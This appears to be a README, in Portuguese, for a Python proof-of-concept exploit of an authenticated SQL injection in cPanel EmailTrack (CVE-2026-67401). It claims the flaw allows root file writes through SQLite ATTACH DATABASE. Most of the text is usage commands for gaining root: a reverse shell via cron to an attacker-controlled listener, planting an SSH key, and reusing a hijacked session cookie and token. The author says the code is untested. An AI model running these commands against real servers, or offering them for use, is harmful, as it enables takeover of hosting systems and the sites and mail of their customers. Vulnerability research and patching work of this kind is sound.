
Prova de conceito em Python para CVE-2026-67401, uma injeção de SQL autenticada no cPanel EmailTrack que permite gravação arbitrária de arquivos como root via SQLite ATTACH DATABASE, possibilitando reverse shell ou inserção de chave SSH.
Injeção de SQL no cPanel EmailTrack. Usuário autenticado do cPanel com privilégios de e-mail grava arquivos arbitrários como root via SQLite ATTACH DATABASE. Uma única requisição até o root. Não foi testado em um alvo real, o código foi montado apenas a partir de informações públicas e diffs básicos. Faça sua devida diligência como pesquisador, teste e envie correções via PR.
Afeta todas as versões do cPanel/WHM anteriores ao patch de 8 de setembro de 2026.
requests# Reverse shell via cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# SSH key drop
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# Sessão existente
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# Dry run (imprime a requisição, não envia)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1